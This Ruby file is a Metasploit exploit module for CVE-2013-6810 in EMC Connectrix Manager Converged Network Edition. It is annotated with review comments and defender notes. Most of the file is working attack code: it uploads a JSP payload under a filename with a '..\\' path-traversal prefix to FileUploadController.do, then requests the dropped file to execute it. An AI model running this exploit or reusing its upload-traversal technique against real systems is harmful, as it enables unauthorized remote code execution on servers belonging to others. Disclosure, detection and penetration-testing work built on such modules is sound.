# Metasploit exploit module for the EMC Connectrix Manager Converged Network
# Edition (CMCNE) FileUploadController file-upload flaw, CVE-2013-6810 /
# ZDI-13-279 (versions <= 11.2.1 per the description below).
#
# Flow, as implemented in #exploit: build a multipart/form-data body whose
# "source" part carries the JSP payload under a filename that starts with a
# "..\\" traversal prefix, POST it to HttpFileUpload/FileUploadController.do,
# and on a success response request the dropped file under dcm-client/.
#
# Defender notes: the request that distinguishes this activity is a
# multipart POST to /HttpFileUpload/FileUploadController.do whose filename
# parameter contains "..\\" sequences and ends in ".jsp"; the module treats
# an HTTP 200 whose body contains "SUCCESSFULLY UPLOADED FILES!" as success,
# and the on-disk artifact is presumably a new .jsp beneath
# deploy\dcm-client.war (the exact location depends on the servlet's working
# directory, which is not visible here).
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata (name, description, references, single
  # Windows/Java target) and the module option RPORT, defaulting to 80.
  #
  # @param info [Hash] base module info merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'EMC CMCNE FileUploadController Remote Code Execution',
      'Description'    => %q{
        This module exploits a fileupload vulnerability found in EMC
        Connectrix Manager Converged Network Edition <= 11.2.1. The file
        upload vulnerability is triggered when sending a specially crafted
        filename to the FileUploadController servlet. This allows the
        attacker to upload a malicious jsp file to anywhere on the remote
        file system.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'james fitts' ],
      'References'     =>
        [
          [ 'ZDI', '13-279' ],
          [ 'CVE', '2013-6810' ]
        ],
      'Privileged'     => true,
      'Platform'       => 'win',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 18 2013'))

    # NOTE(review): the self.class second argument is the older
    # register_options calling form; left as written.
    register_options([Opt::RPORT(80)], self.class)
  end

  # Uploads the JSP payload through the file-upload servlet, then requests it.
  #
  # Success is judged only on the first response (HTTP 200 and a body
  # matching /SUCCESSFULLY UPLOADED FILES!/); the second, GET, response is
  # assigned but never inspected.
  def exploit
    # host:port string used only in log messages
    peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"

    # Relative path prepended to the uploaded filename: three "..\\" segments
    # followed by deploy\dcm-client.war\. Where it resolves on the target
    # depends on the servlet's working directory (not visible here).
    deploy = "..\\..\\..\\deploy\\dcm-client.war\\"

    # Payload with CRLF and bare LF removed, so the JSP is sent as one line.
    jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
    # Random alphanumeric name of 4..31 characters (4 + rand(28)) plus a .jsp
    # extension; kept on the instance for the follow-up GET.
    @jsp_name = "#{rand_text_alphanumeric(4 + rand(32 - 4))}.jsp"

    # Two multipart parts: "source" (the file, traversal prefix in its
    # filename) and "driverFolderName" (five random uppercase letters).
    data = Rex::MIME::Message.new
    data.add_part("#{jsp}", "application/octet-stream", nil, "form-data; name=\"source\"; filename=\"#{deploy}#{@jsp_name}\"")
    data.add_part("#{rand_text_alpha_upper(5)}", nil, nil, "form-data; name=\"driverFolderName\"")

    # Strips a CRLF that immediately precedes a "--_Part_" boundary at the
    # start of a line (Ruby's ^ matches at every line start, not only at the
    # string start). Presumably the servlet rejects a leading blank line
    # before the first boundary — TODO confirm.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")

    print_status("#{peer} - Uploading the JSP Payload...")

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri("HttpFileUpload", "FileUploadController.do"),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # NOTE(review): send_request_cgi yields nil when no response arrives, so
    # res.code raises NoMethodError here instead of reaching the else branch.
    # `and` binds looser than == and =~, so the condition reads as intended;
    # && is the idiomatic form.
    if res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/
      print_good("File uploaded successfully!")
      print_status("Executing '#{@jsp_name}' now...")
      # Response is stored but not checked; a failed GET produces no message.
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri("dcm-client", "#{@jsp_name}")
      })
    else
      print_error("Does not look like the files were uploaded to #{peer}...")
    end
  end
end